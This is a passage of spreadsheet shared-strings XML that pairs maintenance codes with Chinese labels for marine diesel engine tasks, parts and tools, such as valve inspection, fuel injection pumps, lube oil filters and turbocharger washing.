  <si>
    <t>HM0500</t>
  </si>
  <si>
    <t xml:space="preserve">气缸单元拆卸                                            </t>
  </si>
  <si>
    <t>HM0501</t>
  </si>
  <si>
    <t xml:space="preserve">进油阀检查                                             </t>
  </si>
  <si>
    <t>HM0505</t>
  </si>
  <si>
    <t xml:space="preserve">阀座重新调整                                            </t>
  </si>
  <si>
    <t>HM0510</t>
  </si>
  <si>
    <t xml:space="preserve">阀转子                                               </t>
  </si>
  <si>
    <t>HM0515</t>
  </si>
  <si>
    <t xml:space="preserve">阀套更换                                              </t>
  </si>
  <si>
    <t>HM0520</t>
  </si>
  <si>
    <t xml:space="preserve">安全阀调节和检查                                          </t>
  </si>
  <si>
    <t>HM0525</t>
  </si>
  <si>
    <t>HM0526</t>
  </si>
  <si>
    <t xml:space="preserve">喷油系统衬套更换                                          </t>
  </si>
  <si>
    <t>HM0530</t>
  </si>
  <si>
    <t xml:space="preserve">阀座环更换                                             </t>
  </si>
  <si>
    <t>HM0535</t>
  </si>
  <si>
    <t>HM0540</t>
  </si>
  <si>
    <t xml:space="preserve">缸盖冷却水系统检查                                         </t>
  </si>
  <si>
    <t>HM0545</t>
  </si>
  <si>
    <t xml:space="preserve">气缸单元布置                                            </t>
  </si>
  <si>
    <t>HM0550</t>
  </si>
  <si>
    <t xml:space="preserve">气缸单元装机                                            </t>
  </si>
  <si>
    <t>HM0555</t>
  </si>
  <si>
    <t xml:space="preserve">活塞连杆拆装                                            </t>
  </si>
  <si>
    <t>HM0600</t>
  </si>
  <si>
    <t xml:space="preserve">活塞和活塞杆的分离组装                                       </t>
  </si>
  <si>
    <t>HM0605</t>
  </si>
  <si>
    <t>HM0610</t>
  </si>
  <si>
    <t>HM0615</t>
  </si>
  <si>
    <t xml:space="preserve">活塞和连杆的安装                                          </t>
  </si>
  <si>
    <t>HM0620</t>
  </si>
  <si>
    <t xml:space="preserve">连杆系统液压上紧                                          </t>
  </si>
  <si>
    <t>HM0625</t>
  </si>
  <si>
    <t xml:space="preserve">检查和研磨                                             </t>
  </si>
  <si>
    <t>HM0635</t>
  </si>
  <si>
    <t xml:space="preserve">缸套更换                                              </t>
  </si>
  <si>
    <t>HM0640</t>
  </si>
  <si>
    <t xml:space="preserve">座面研磨                                              </t>
  </si>
  <si>
    <t>HM0645</t>
  </si>
  <si>
    <t xml:space="preserve">活塞气缸拆装                                            </t>
  </si>
  <si>
    <t>HM0650</t>
  </si>
  <si>
    <t xml:space="preserve">凸轮和凸轮驱动检查                                         </t>
  </si>
  <si>
    <t>HM0700</t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴轴承的检查和更换                                       </t>
  </si>
  <si>
    <t>HM0705</t>
  </si>
  <si>
    <t>HM0720</t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵升程测量                                           </t>
  </si>
  <si>
    <t>HM0725</t>
  </si>
  <si>
    <t xml:space="preserve">排气阀滚轮导套检查                                         </t>
  </si>
  <si>
    <t>HM0800</t>
  </si>
  <si>
    <t xml:space="preserve">喷油泵滚轮导套检查                                         </t>
  </si>
  <si>
    <t>HM0805</t>
  </si>
  <si>
    <t xml:space="preserve">阀的控制和调节                                           </t>
  </si>
  <si>
    <t>HM0810</t>
  </si>
  <si>
    <t xml:space="preserve">功能测试和调节                                           </t>
  </si>
  <si>
    <t>HM0900</t>
  </si>
  <si>
    <t xml:space="preserve">起停的调整和测试                                          </t>
  </si>
  <si>
    <t>HM0901</t>
  </si>
  <si>
    <t xml:space="preserve">功能测试                                              </t>
  </si>
  <si>
    <t>HM0902</t>
  </si>
  <si>
    <t xml:space="preserve">压力控制器的调整和测试                                       </t>
  </si>
  <si>
    <t>HM0903</t>
  </si>
  <si>
    <t xml:space="preserve">温度传感器的调整和测试                                       </t>
  </si>
  <si>
    <t>HM0904</t>
  </si>
  <si>
    <t xml:space="preserve">停车功能测试                                            </t>
  </si>
  <si>
    <t>HM0905</t>
  </si>
  <si>
    <t xml:space="preserve">传感器的安装和调整                                         </t>
  </si>
  <si>
    <t>HM0908</t>
  </si>
  <si>
    <t xml:space="preserve">lambda控制器的调整                                      </t>
  </si>
  <si>
    <t>HM0910</t>
  </si>
  <si>
    <t xml:space="preserve">检查主轴承甩挡                                           </t>
  </si>
  <si>
    <t>HM1000</t>
  </si>
  <si>
    <t>HM1004</t>
  </si>
  <si>
    <t xml:space="preserve">轴瓦的检查                                             </t>
  </si>
  <si>
    <t>HM1005</t>
  </si>
  <si>
    <t xml:space="preserve">曲轴功能测试                                            </t>
  </si>
  <si>
    <t>HM1100</t>
  </si>
  <si>
    <t xml:space="preserve">空冷器检查                                             </t>
  </si>
  <si>
    <t>HM1200</t>
  </si>
  <si>
    <t xml:space="preserve">透平端干洗                                             </t>
  </si>
  <si>
    <t>HM1201</t>
  </si>
  <si>
    <t xml:space="preserve">压气机端水洗                                            </t>
  </si>
  <si>
    <t>HM1205</t>
  </si>
  <si>
    <t xml:space="preserve">排气管补偿器                                            </t>
  </si>
  <si>
    <t>HM1210</t>
  </si>
  <si>
    <t xml:space="preserve">透平端水洗                                             </t>
  </si>
  <si>
    <t>HM1215</t>
  </si>
  <si>
    <t xml:space="preserve">空气过滤器                                             </t>
  </si>
  <si>
    <t>HM1321</t>
  </si>
  <si>
    <t>HM1325</t>
  </si>
  <si>
    <t xml:space="preserve">检查测试空气启动器                                         </t>
  </si>
  <si>
    <t>HM1330</t>
  </si>
  <si>
    <t xml:space="preserve">应急起动阀                                             </t>
  </si>
  <si>
    <t>HM1340</t>
  </si>
  <si>
    <t xml:space="preserve">检查压缩空气                                            </t>
  </si>
  <si>
    <t>HM1390</t>
  </si>
  <si>
    <t xml:space="preserve">燃油供给泵                                             </t>
  </si>
  <si>
    <t>HM1400</t>
  </si>
  <si>
    <t xml:space="preserve">最大压缩压力的调整                                         </t>
  </si>
  <si>
    <t>HM1401</t>
  </si>
  <si>
    <t xml:space="preserve">喷射泵拆装                                             </t>
  </si>
  <si>
    <t>HM1405</t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵拆卸和安装                                          </t>
  </si>
  <si>
    <t>HM1406</t>
  </si>
  <si>
    <t xml:space="preserve">燃油喷射阀                                             </t>
  </si>
  <si>
    <t>HM1410</t>
  </si>
  <si>
    <t xml:space="preserve">燃油分离滤器                                            </t>
  </si>
  <si>
    <t>HM1415</t>
  </si>
  <si>
    <t xml:space="preserve">检查燃油管                                             </t>
  </si>
  <si>
    <t>HM1490</t>
  </si>
  <si>
    <t>HM1500</t>
  </si>
  <si>
    <t xml:space="preserve">预润滑泵                                              </t>
  </si>
  <si>
    <t>HM1505</t>
  </si>
  <si>
    <t>HM1506</t>
  </si>
  <si>
    <t xml:space="preserve">滑油过滤器                                             </t>
  </si>
  <si>
    <t>HM1510</t>
  </si>
  <si>
    <t>HM1515</t>
  </si>
  <si>
    <t>HM1520</t>
  </si>
  <si>
    <t xml:space="preserve">检查滑油管                                             </t>
  </si>
  <si>
    <t>HM1590</t>
  </si>
  <si>
    <t xml:space="preserve">检查冷却水系统                                           </t>
  </si>
  <si>
    <t>HM1601</t>
  </si>
  <si>
    <t>HM1604</t>
  </si>
  <si>
    <t xml:space="preserve">高温水泵和低温水泵                                         </t>
  </si>
  <si>
    <t>HM1610</t>
  </si>
  <si>
    <t>HM1690</t>
  </si>
  <si>
    <t>HM1900</t>
  </si>
  <si>
    <t xml:space="preserve">锥管更换                                              </t>
  </si>
  <si>
    <t>HM1905</t>
  </si>
  <si>
    <t xml:space="preserve">锥管维护                                              </t>
  </si>
  <si>
    <t>HM1910</t>
  </si>
  <si>
    <t xml:space="preserve">液压工具测试                                            </t>
  </si>
  <si>
    <t>HM2005</t>
  </si>
  <si>
    <t xml:space="preserve">液压工具的应用                                           </t>
  </si>
  <si>
    <t>HM2006</t>
  </si>
  <si>
    <t>HM2007</t>
  </si>
  <si>
    <t xml:space="preserve">液压工具维护                                            </t>
  </si>
  <si>
    <t>HM2010</t>
  </si>
  <si>
    <t xml:space="preserve">扭力扳手拧紧                                            </t>
  </si>
  <si>
    <t>HM2015</t>
  </si>
  <si>
    <t xml:space="preserve">连杆组合工具                                            </t>
  </si>
  <si>
    <t>HM2020</t>
  </si>
  <si>
    <t xml:space="preserve">最高压力指示                                            </t>
  </si>
  <si>
    <t>HM2025</t>
  </si>
  <si>
    <t xml:space="preserve">气缸单元工具箱                                           </t>
  </si>
  <si>
    <t>HP0500</t>
  </si>
  <si>
    <t>HP0501</t>
  </si>
  <si>
    <t xml:space="preserve">阀杆和阀导筒                                            </t>
  </si>
  <si>
    <t>HP0502</t>
  </si>
  <si>
    <t xml:space="preserve">安全阀和示功阀                                           </t>
  </si>
  <si>
    <t>HP0508</t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖顶盖                                             </t>
  </si>
  <si>
    <t>HP0510</t>
  </si>
  <si>
    <t>HP0515</t>
  </si>
  <si>
    <t xml:space="preserve">活塞和连杆                                             </t>
  </si>
  <si>
    <t>HP0601</t>
  </si>
  <si>
    <t>HP0610</t>
  </si>
  <si>
    <t>HP0701</t>
  </si>
  <si>
    <t>HP0705</t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导套和顶杆                                           </t>
  </si>
  <si>
    <t>HP0801</t>
  </si>
  <si>
    <t xml:space="preserve">电子调速器及其驱动器                                        </t>
  </si>
  <si>
    <t>HP0901</t>
  </si>
  <si>
    <t xml:space="preserve">调节设备                                              </t>
  </si>
  <si>
    <t>HP0902</t>
  </si>
  <si>
    <t xml:space="preserve">超速设备                                              </t>
  </si>
  <si>
    <t>HP0903</t>
  </si>
  <si>
    <t>HP0907</t>
  </si>
  <si>
    <t>HP0908</t>
  </si>
  <si>
    <t xml:space="preserve">油箱液位开关                                            </t>
  </si>
  <si>
    <t>HP0920</t>
  </si>
  <si>
    <t>HP0925</t>
  </si>
  <si>
    <t xml:space="preserve">监控箱                                               </t>
  </si>
  <si>
    <t>HP0935</t>
  </si>
  <si>
    <t>HP0945</t>
  </si>
  <si>
    <t>HP0946</t>
  </si>
  <si>
    <t xml:space="preserve">输出模块                                              </t>
  </si>
  <si>
    <t>HP0947</t>
  </si>
  <si>
    <t xml:space="preserve">APM发动机控制                                          </t>
  </si>
  <si>
    <t>HP0948</t>
  </si>
  <si>
    <t xml:space="preserve">阀控箱                                               </t>
  </si>
  <si>
    <t>HP0949</t>
  </si>
  <si>
    <t>HP1001</t>
  </si>
  <si>
    <t xml:space="preserve">本地齿轮                                              </t>
  </si>
  <si>
    <t>HP1002</t>
  </si>
  <si>
    <t xml:space="preserve">带齿飞轮                                              </t>
  </si>
  <si>
    <t>HP1003</t>
  </si>
  <si>
    <t>HP1101</t>
  </si>
  <si>
    <t>HP1102</t>
  </si>
  <si>
    <t xml:space="preserve">前端箱                                               </t>
  </si>
  <si>
    <t>HP1103</t>
  </si>
  <si>
    <t xml:space="preserve">框架门盖                                              </t>
  </si>
  <si>
    <t>HP1106</t>
  </si>
  <si>
    <t xml:space="preserve">底座台架                                              </t>
  </si>
  <si>
    <t>HP1111</t>
  </si>
  <si>
    <t>HP1201</t>
  </si>
  <si>
    <t>HP1202</t>
  </si>
  <si>
    <t>HP1203</t>
  </si>
  <si>
    <t xml:space="preserve">压气机水洗                                             </t>
  </si>
  <si>
    <t>HP1205</t>
  </si>
  <si>
    <t>HP1206</t>
  </si>
  <si>
    <t xml:space="preserve">泄放油盘                                              </t>
  </si>
  <si>
    <t>HP1208</t>
  </si>
  <si>
    <t xml:space="preserve">增压器干洗罐                                            </t>
  </si>
  <si>
    <t>HP1210</t>
  </si>
  <si>
    <t>HP1230</t>
  </si>
  <si>
    <t xml:space="preserve">增压器滑油管                                            </t>
  </si>
  <si>
    <t>HP1231</t>
  </si>
  <si>
    <t xml:space="preserve">空气起动器                                             </t>
  </si>
  <si>
    <t>HP1309</t>
  </si>
  <si>
    <t xml:space="preserve">主启动阀                                              </t>
  </si>
  <si>
    <t>HP1310</t>
  </si>
  <si>
    <t>HP1312</t>
  </si>
  <si>
    <t>HP1313</t>
  </si>
  <si>
    <t>HP1314</t>
  </si>
  <si>
    <t xml:space="preserve">主停车阀                                              </t>
  </si>
  <si>
    <t>HP1315</t>
  </si>
  <si>
    <t>HP1316</t>
  </si>
  <si>
    <t>HP1319</t>
  </si>
  <si>
    <t xml:space="preserve">喷射系统开关阀                                           </t>
  </si>
  <si>
    <t>HP1320</t>
  </si>
  <si>
    <t>HP1321</t>
  </si>
  <si>
    <t>HP1322</t>
  </si>
  <si>
    <t xml:space="preserve">带附件的盘车齿轮                                          </t>
  </si>
  <si>
    <t>HP1325</t>
  </si>
  <si>
    <t xml:space="preserve">超速停车阀                                             </t>
  </si>
  <si>
    <t>HP1327</t>
  </si>
  <si>
    <t>HP1330</t>
  </si>
  <si>
    <t>HP1335</t>
  </si>
  <si>
    <t xml:space="preserve">燃油喷射泵                                             </t>
  </si>
  <si>
    <t>HP1401</t>
  </si>
  <si>
    <t>HP1402</t>
  </si>
  <si>
    <t xml:space="preserve">燃油双重滤器                                            </t>
  </si>
  <si>
    <t>HP1403</t>
  </si>
  <si>
    <t xml:space="preserve">燃油喷射管                                             </t>
  </si>
  <si>
    <t>HP1404</t>
  </si>
  <si>
    <t>HP1410</t>
  </si>
  <si>
    <t xml:space="preserve">安全滤器                                              </t>
  </si>
  <si>
    <t>HP1415</t>
  </si>
  <si>
    <t>HP1425</t>
  </si>
  <si>
    <t>HP1430</t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵连接                                             </t>
  </si>
  <si>
    <t>HP1435</t>
  </si>
  <si>
    <t>HP1440</t>
  </si>
  <si>
    <t xml:space="preserve">船用柴油泵单元                                           </t>
  </si>
  <si>
    <t>HP1450</t>
  </si>
  <si>
    <t xml:space="preserve">船用柴油紧急泵                                           </t>
  </si>
  <si>
    <t>HP1451</t>
  </si>
  <si>
    <t>HP1452</t>
  </si>
  <si>
    <t xml:space="preserve">2位2通电磁阀                                           </t>
  </si>
  <si>
    <t>HP1453</t>
  </si>
  <si>
    <t>HP1515</t>
  </si>
  <si>
    <t xml:space="preserve">手动叶轮泵                                             </t>
  </si>
  <si>
    <t>HP1525</t>
  </si>
  <si>
    <t>HP1530</t>
  </si>
  <si>
    <t xml:space="preserve">曲柄箱透气布置                                           </t>
  </si>
  <si>
    <t>HP1531</t>
  </si>
  <si>
    <t>HP1535</t>
  </si>
  <si>
    <t>HP1610</t>
  </si>
  <si>
    <t xml:space="preserve">缸盖管系                                              </t>
  </si>
  <si>
    <t>HP1625</t>
  </si>
  <si>
    <t xml:space="preserve">冷却水管/接头                                           </t>
  </si>
  <si>
    <t>HP1630</t>
  </si>
  <si>
    <t>HP1635</t>
  </si>
  <si>
    <t xml:space="preserve">挠性外部连接                                            </t>
  </si>
  <si>
    <t>HP1902</t>
  </si>
  <si>
    <t xml:space="preserve">圆锥单元                                              </t>
  </si>
  <si>
    <t>HP1903</t>
  </si>
  <si>
    <t xml:space="preserve">正常维护标配工具                                          </t>
  </si>
  <si>
    <t>HP2000</t>
  </si>
  <si>
    <t xml:space="preserve">重新调整工具                                            </t>
  </si>
  <si>
    <t>HP2001</t>
  </si>
  <si>
    <t>HP2005</t>
  </si>
  <si>
    <t>HP2006</t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴工具                                             </t>
  </si>
  <si>
    <t>HP2007</t>
  </si>
  <si>
    <t xml:space="preserve">操作齿轮工具                                            </t>
  </si>
  <si>
    <t>HP2008</t>
  </si>
  <si>
    <t xml:space="preserve">控制和安全系统工具                                         </t>
  </si>
  <si>
    <t>HP2009</t>
  </si>
  <si>
    <t>HP2010</t>
  </si>
  <si>
    <t>HP2012</t>
  </si>
  <si>
    <t>HP2014</t>
  </si>
  <si>
    <t xml:space="preserve">滑油冷却器工具                                           </t>
  </si>
  <si>
    <t>HP2015</t>
  </si>
  <si>
    <t>HP2021</t>
  </si>
  <si>
    <t xml:space="preserve">下部检查孔工具                                           </t>
  </si>
  <si>
    <t>HP2050</t>
  </si>
  <si>
    <t xml:space="preserve">主数据                                               </t>
  </si>
  <si>
    <t>ID00A1</t>
  </si>
  <si>
    <t>ID00B1</t>
  </si>
  <si>
    <t xml:space="preserve">MCR使用重油运行时的能力                                     </t>
  </si>
  <si>
    <t>ID00C2</t>
  </si>
  <si>
    <t xml:space="preserve">重油的维护，主要的检查                                       </t>
  </si>
  <si>
    <t>ID00D2</t>
  </si>
  <si>
    <t xml:space="preserve">重油的维护，操作时的责任                                      </t>
  </si>
  <si>
    <t>ID00E2</t>
  </si>
  <si>
    <t xml:space="preserve">操作数据和设定点                                          </t>
  </si>
  <si>
    <t>ID00F1</t>
  </si>
  <si>
    <t>ID02A1</t>
  </si>
  <si>
    <t xml:space="preserve">服务期后的检查                                           </t>
  </si>
  <si>
    <t>ID02B1</t>
  </si>
  <si>
    <t>ID02D1</t>
  </si>
  <si>
    <t xml:space="preserve">冷凝液                                               </t>
  </si>
  <si>
    <t>ID02E1</t>
  </si>
  <si>
    <t xml:space="preserve">缸套内窥镜检查                                           </t>
  </si>
  <si>
    <t>ID02F1</t>
  </si>
  <si>
    <t>ID06B1</t>
  </si>
  <si>
    <t xml:space="preserve">操作干扰                                              </t>
  </si>
  <si>
    <t>ID06C1</t>
  </si>
  <si>
    <t xml:space="preserve">冷却水系统故障                                           </t>
  </si>
  <si>
    <t>ID06E1</t>
  </si>
  <si>
    <t xml:space="preserve">滑油系统故障                                            </t>
  </si>
  <si>
    <t>ID06F1</t>
  </si>
  <si>
    <t>ID10A1</t>
  </si>
  <si>
    <t>ID10B1</t>
  </si>
  <si>
    <t xml:space="preserve">曲轴和主轴承                                            </t>
  </si>
  <si>
    <t>ID12A1</t>
  </si>
  <si>
    <t xml:space="preserve">减震器衬套弹簧                                           </t>
  </si>
  <si>
    <t>ID12B1</t>
  </si>
  <si>
    <t>ID14A1</t>
  </si>
  <si>
    <t>ID16A1</t>
  </si>
  <si>
    <t>ID16B1</t>
  </si>
  <si>
    <t xml:space="preserve">涡轮和空冷器                                            </t>
  </si>
  <si>
    <t>ID18A1</t>
  </si>
  <si>
    <t>ID20A1</t>
  </si>
  <si>
    <t xml:space="preserve">燃油系统-船用柴油                                         </t>
  </si>
  <si>
    <t>ID20B1</t>
  </si>
  <si>
    <t xml:space="preserve">燃油系统-重油                                           </t>
  </si>
  <si>
    <t>ID20B2</t>
  </si>
  <si>
    <t xml:space="preserve">燃油喷射系统                                            </t>
  </si>
  <si>
    <t>ID20C1</t>
  </si>
  <si>
    <t>ID26A1</t>
  </si>
  <si>
    <t xml:space="preserve">滑油系统                                              </t>
  </si>
  <si>
    <t>ID28A1</t>
  </si>
  <si>
    <t xml:space="preserve">反冲式滑油滤器                                           </t>
  </si>
  <si>
    <t>ID28B1</t>
  </si>
  <si>
    <t>ID30A1</t>
  </si>
  <si>
    <t xml:space="preserve">本地监控，控制和安全                                        </t>
  </si>
  <si>
    <t>ID80A1</t>
  </si>
  <si>
    <t xml:space="preserve">机用传感器                                             </t>
  </si>
  <si>
    <t>ID84A1</t>
  </si>
  <si>
    <t xml:space="preserve">轴承拆卸和安装                                           </t>
  </si>
  <si>
    <t>IM1001</t>
  </si>
  <si>
    <t xml:space="preserve">安全阀功能测试                                           </t>
  </si>
  <si>
    <t>IM1002</t>
  </si>
  <si>
    <t xml:space="preserve">性能数据记录                                            </t>
  </si>
  <si>
    <t>IM1011</t>
  </si>
  <si>
    <t xml:space="preserve">曲轴甩挡记录                                            </t>
  </si>
  <si>
    <t>IM1210</t>
  </si>
  <si>
    <t>IM1401</t>
  </si>
  <si>
    <t>IM1402</t>
  </si>
  <si>
    <t xml:space="preserve">排气阀和喷油正时的设定                                       </t>
  </si>
  <si>
    <t>IM1403</t>
  </si>
  <si>
    <t xml:space="preserve">凸轮从动件和摇臂检查                                        </t>
  </si>
  <si>
    <t>IM1404</t>
  </si>
  <si>
    <t xml:space="preserve">主机缸体拆卸                                            </t>
  </si>
  <si>
    <t>IM1601</t>
  </si>
  <si>
    <t>IM1602</t>
  </si>
  <si>
    <t xml:space="preserve">活塞和气缸套拆装                                          </t>
  </si>
  <si>
    <t>IM1603</t>
  </si>
  <si>
    <t xml:space="preserve">进气阀和排气阀检查                                         </t>
  </si>
  <si>
    <t>IM1604</t>
  </si>
  <si>
    <t xml:space="preserve">阀座环和阀座的打磨                                         </t>
  </si>
  <si>
    <t>IM1605</t>
  </si>
  <si>
    <t xml:space="preserve">阀导套更换                                             </t>
  </si>
  <si>
    <t>IM1606</t>
  </si>
  <si>
    <t>IM1607</t>
  </si>
  <si>
    <t xml:space="preserve">活塞检查                                              </t>
  </si>
  <si>
    <t>IM1608</t>
  </si>
  <si>
    <t xml:space="preserve">缸盖重装和安装                                           </t>
  </si>
  <si>
    <t>IM1609</t>
  </si>
  <si>
    <t xml:space="preserve">连杆大端轴承检查                                          </t>
  </si>
  <si>
    <t>IM1610</t>
  </si>
  <si>
    <t xml:space="preserve">缸套检查处理                                            </t>
  </si>
  <si>
    <t>IM1611</t>
  </si>
  <si>
    <t xml:space="preserve">座面研磨机                                             </t>
  </si>
  <si>
    <t>IM1612</t>
  </si>
  <si>
    <t xml:space="preserve">气缸单元安装                                            </t>
  </si>
  <si>
    <t>IM1613</t>
  </si>
  <si>
    <t>IM1614</t>
  </si>
  <si>
    <t xml:space="preserve">排气阀转子检查                                           </t>
  </si>
  <si>
    <t>IM1615</t>
  </si>
  <si>
    <t xml:space="preserve">阀的间隙检查和调节                                         </t>
  </si>
  <si>
    <t>IM1616</t>
  </si>
  <si>
    <t xml:space="preserve">示功阀检查和检修                                          </t>
  </si>
  <si>
    <t>IM1617</t>
  </si>
  <si>
    <t xml:space="preserve">检查安全阀开启压力                                         </t>
  </si>
  <si>
    <t>IM1618</t>
  </si>
  <si>
    <t xml:space="preserve">扫气空气冷却器                                           </t>
  </si>
  <si>
    <t>IM1801</t>
  </si>
  <si>
    <t>IM1802</t>
  </si>
  <si>
    <t>IM2001</t>
  </si>
  <si>
    <t xml:space="preserve">喷油泵拆卸/维修和更换                                       </t>
  </si>
  <si>
    <t>IM2002</t>
  </si>
  <si>
    <t xml:space="preserve">燃油阀的检查                                            </t>
  </si>
  <si>
    <t>IM2003</t>
  </si>
  <si>
    <t xml:space="preserve">滑油泵的检查                                            </t>
  </si>
  <si>
    <t>IM2801</t>
  </si>
  <si>
    <t xml:space="preserve">反冲式过滤器的拆卸和检查                                      </t>
  </si>
  <si>
    <t>IM2802</t>
  </si>
  <si>
    <t xml:space="preserve">滑油温控阀的检查                                          </t>
  </si>
  <si>
    <t>IM2803</t>
  </si>
  <si>
    <t xml:space="preserve">滑油冷却器的检查                                          </t>
  </si>
  <si>
    <t>IM2804</t>
  </si>
  <si>
    <t>IM3001</t>
  </si>
  <si>
    <t xml:space="preserve">冷却水泵的检查和替换                                        </t>
  </si>
  <si>
    <t>IM3002</t>
  </si>
  <si>
    <t>IM8401</t>
  </si>
  <si>
    <t xml:space="preserve">压力传感器的调整和测试                                       </t>
  </si>
  <si>
    <t>IM8402</t>
  </si>
  <si>
    <t>IM8403</t>
  </si>
  <si>
    <t>IM8404</t>
  </si>
  <si>
    <t xml:space="preserve">液位传感器的调整和测试                                       </t>
  </si>
  <si>
    <t>IM8405</t>
  </si>
  <si>
    <t xml:space="preserve">位移传感器的调整和测试                                       </t>
  </si>
  <si>
    <t>IM8407</t>
  </si>
  <si>
    <t xml:space="preserve">轴承支架                                              </t>
  </si>
  <si>
    <t>IP1012</t>
  </si>
  <si>
    <t>IP1014</t>
  </si>
  <si>
    <t>IP1016</t>
  </si>
  <si>
    <t>IP1018</t>
  </si>
  <si>
    <t>IP1210</t>
  </si>
  <si>
    <t xml:space="preserve">功率输出                                              </t>
  </si>
  <si>
    <t>IP1212</t>
  </si>
  <si>
    <t>IP1214</t>
  </si>
  <si>
    <t>IP1216</t>
  </si>
  <si>
    <t xml:space="preserve">离合器                                               </t>
  </si>
  <si>
    <t>IP1218</t>
  </si>
  <si>
    <t>IP1220</t>
  </si>
  <si>
    <t>IP1410</t>
  </si>
  <si>
    <t xml:space="preserve">驱动                                                </t>
  </si>
  <si>
    <t>IP1412</t>
  </si>
  <si>
    <t xml:space="preserve">排气阀和喷油泵的滚轮导套                                      </t>
  </si>
  <si>
    <t>IP1414</t>
  </si>
  <si>
    <t>IP1610</t>
  </si>
  <si>
    <t xml:space="preserve">带活塞环和活塞销的活塞                                       </t>
  </si>
  <si>
    <t>IP1614</t>
  </si>
  <si>
    <t>IP1616</t>
  </si>
  <si>
    <t xml:space="preserve">阀防护装置                                             </t>
  </si>
  <si>
    <t>IP1620</t>
  </si>
  <si>
    <t>IP1810</t>
  </si>
  <si>
    <t>IP1812</t>
  </si>
  <si>
    <t>IP1814</t>
  </si>
  <si>
    <t xml:space="preserve">扫气空气连接                                            </t>
  </si>
  <si>
    <t>IP1816</t>
  </si>
  <si>
    <t>IP1818</t>
  </si>
  <si>
    <t xml:space="preserve">涡轮清洁--重油                                          </t>
  </si>
  <si>
    <t>IP1820</t>
  </si>
  <si>
    <t>IP1824</t>
  </si>
  <si>
    <t xml:space="preserve">排气补偿器                                             </t>
  </si>
  <si>
    <t>IP1826</t>
  </si>
  <si>
    <t>IP2010</t>
  </si>
  <si>
    <t>IP2012</t>
  </si>
  <si>
    <t>IP2014</t>
  </si>
  <si>
    <t>IP2016</t>
  </si>
  <si>
    <t>IP2018</t>
  </si>
  <si>
    <t>IP2020</t>
  </si>
  <si>
    <t xml:space="preserve">温度计套件                                             </t>
  </si>
  <si>
    <t>IP2050</t>
  </si>
  <si>
    <t>IP2410</t>
  </si>
  <si>
    <t>IP2412</t>
  </si>
  <si>
    <t xml:space="preserve">启动空气滑阀                                            </t>
  </si>
  <si>
    <t>IP2610</t>
  </si>
  <si>
    <t>IP2612</t>
  </si>
  <si>
    <t xml:space="preserve">启动空气管系                                            </t>
  </si>
  <si>
    <t>IP2616</t>
  </si>
  <si>
    <t xml:space="preserve">空气起动器马达                                           </t>
  </si>
  <si>
    <t>IP2618</t>
  </si>
  <si>
    <t xml:space="preserve">启动空气集管和压力计                                        </t>
  </si>
  <si>
    <t>IP2620</t>
  </si>
  <si>
    <t>IP2812</t>
  </si>
  <si>
    <t xml:space="preserve">压力调节器                                             </t>
  </si>
  <si>
    <t>IP2814</t>
  </si>
  <si>
    <t xml:space="preserve">滑油全流量过滤器                                          </t>
  </si>
  <si>
    <t>IP2816</t>
  </si>
  <si>
    <t>IP2818</t>
  </si>
  <si>
    <t xml:space="preserve">滑油恒温阀                                             </t>
  </si>
  <si>
    <t>IP2820</t>
  </si>
  <si>
    <t>IP2824</t>
  </si>
  <si>
    <t>IP2836</t>
  </si>
  <si>
    <t xml:space="preserve">滑油滤器-外部管系                                         </t>
  </si>
  <si>
    <t>IP2850</t>
  </si>
  <si>
    <t xml:space="preserve">高温泵                                               </t>
  </si>
  <si>
    <t>IP3010</t>
  </si>
  <si>
    <t xml:space="preserve">冷却水自动调温器                                          </t>
  </si>
  <si>
    <t>IP3012</t>
  </si>
  <si>
    <t xml:space="preserve">高温冷却器                                             </t>
  </si>
  <si>
    <t>IP3014</t>
  </si>
  <si>
    <t xml:space="preserve">高温/低温和高低温混合管系                                     </t>
  </si>
  <si>
    <t>IP3016</t>
  </si>
  <si>
    <t xml:space="preserve">低温泵                                               </t>
  </si>
  <si>
    <t>IP3210</t>
  </si>
  <si>
    <t xml:space="preserve">海水管                                               </t>
  </si>
  <si>
    <t>IP3214</t>
  </si>
  <si>
    <t>IP8010</t>
  </si>
  <si>
    <t xml:space="preserve">本地控制装置                                            </t>
  </si>
  <si>
    <t>IP8210</t>
  </si>
  <si>
    <t>IP8412</t>
  </si>
  <si>
    <t>IP8416</t>
  </si>
  <si>
    <t>IP8420</t>
  </si>
  <si>
    <t>IP8424</t>
  </si>
  <si>
    <t xml:space="preserve">转速和接近传感器                                          </t>
  </si>
  <si>
    <t>IP8428</t>
  </si>
  <si>
    <t>IP9000</t>
  </si>
  <si>
    <t>IP9001</t>
  </si>
  <si>
    <t xml:space="preserve">活塞连杆工具                                            </t>
  </si>
  <si>
    <t>IP9002</t>
  </si>
  <si>
    <t xml:space="preserve">缸套工具                                              </t>
  </si>
  <si>
    <t>IP9003</t>
  </si>
  <si>
    <t xml:space="preserve">油泵油阀工具                                            </t>
  </si>
  <si>
    <t>IP9004</t>
  </si>
  <si>
    <t xml:space="preserve">主轴承工具                                             </t>
  </si>
  <si>
    <t>IP9005</t>
  </si>
  <si>
    <t xml:space="preserve">示功阀工具                                             </t>
  </si>
  <si>
    <t>IP9006</t>
  </si>
  <si>
    <t xml:space="preserve">控制器械                                              </t>
  </si>
  <si>
    <t>IP9007</t>
  </si>
  <si>
    <t xml:space="preserve">滑油冷却器安装设备                                         </t>
  </si>
  <si>
    <t>IP9008</t>
  </si>
  <si>
    <t xml:space="preserve">滑油过滤器提升工具                                         </t>
  </si>
  <si>
    <t>IP9009</t>
  </si>
  <si>
    <t xml:space="preserve">中冷器提升工具                                           </t>
  </si>
  <si>
    <t>IP9010</t>
  </si>
  <si>
    <t xml:space="preserve">冷却水接头杆                                            </t>
  </si>
  <si>
    <t>IP9011</t>
  </si>
  <si>
    <t xml:space="preserve">叉形中间块                                             </t>
  </si>
  <si>
    <t>IP9012</t>
  </si>
  <si>
    <t xml:space="preserve">增压器干洗装置                                           </t>
  </si>
  <si>
    <t>IP9013</t>
  </si>
  <si>
    <t>IP9014</t>
  </si>
  <si>
    <t xml:space="preserve">停增压器装置                                            </t>
  </si>
  <si>
    <t>IP9017</t>
  </si>
  <si>
    <t>网络</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7B4230</t>
